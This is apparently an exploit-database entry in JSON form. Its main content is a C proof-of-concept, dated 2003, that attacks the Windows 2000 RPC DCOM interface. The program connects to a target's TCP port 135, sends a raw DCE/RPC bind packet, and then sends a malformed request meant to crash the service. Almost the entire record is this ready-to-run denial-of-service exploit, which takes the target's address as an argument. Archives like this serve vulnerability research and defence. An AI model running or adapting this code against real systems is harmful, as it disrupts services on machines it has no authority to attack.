Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-15244", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2003-07-21T00:00:00", "title": "MS Windows 2000 RPC DCOM Interface DoS Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-15244", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2003-07-21T00:00:00", "sourceData": "\n // This is a new unpatched vulnerability - NOT the MS03-026\r\n\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n#include <windows.h>\r\n#include <process.h>\r\n#include <string.h>\r\n#include <winbase.h>\r\n\r\nunsigned char bindstr[]={\r\n0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,\r\n0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,\r\n0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,\r\n0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,\r\n0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};\r\n\r\nunsigned char request[]={\r\n0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,\r\n0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,\r\n0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,\r\n0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};\r\n\r\n\r\n\r\nvoid main(int argc,char ** argv)\r\n{\r\n WSADATA WSAData;\r\n int i;\r\n SOCKET sock;\r\n SOCKADDR_IN addr_in;\r\n \r\n short port=135;\r\n unsigned char buf1[0x1000];\r\n printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\\n");\r\n printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry xfocus org\\n");\r\n printf("Welcome to http://www.xfocus.net\\n");\r\n if(argc<2)\r\n {\r\n printf("useage:%s target\\n",argv[0]);\r\nexit(1);\r\n }\r\n\r\n\r\n if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)\r\n {\r\n printf("WSAStartup error.Error:%d\\n",WSAGetLastError());\r\n return;\r\n }\r\n\r\n addr_in.sin_family=AF_INET;\r\n addr_in.sin_port=htons(port);\r\n addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);\r\n \r\n if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)\r\n {\r\n printf("Socket failed.Error:%d\\n",WSAGetLastError());\r\n return;\r\n }\r\n if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)\r\n {\r\n printf("Connect failed.Error:%d",WSAGetLastError());\r\n return;\r\n }\r\n if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)\r\n {\r\n printf("Send failed.Error:%d\\n",WSAGetLastError());\r\n return;\r\n }\r\n\r\n i=recv(sock,buf1,1024,MSG_PEEK);\r\n if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)\r\n {\r\n printf("Send failed.Error:%d\\n",WSAGetLastError());\r\n return;\r\n }\r\n i=recv(sock,buf1,1024,MSG_PEEK);\r\n}\r\n\r\n\n\n// milw0rm.com [2003-07-21]\n\n ", "id": "SSV:15244", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:38:57", "reporter": "Root", "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645461967, "score": 1659785532, "epss": 1678851499}}
{}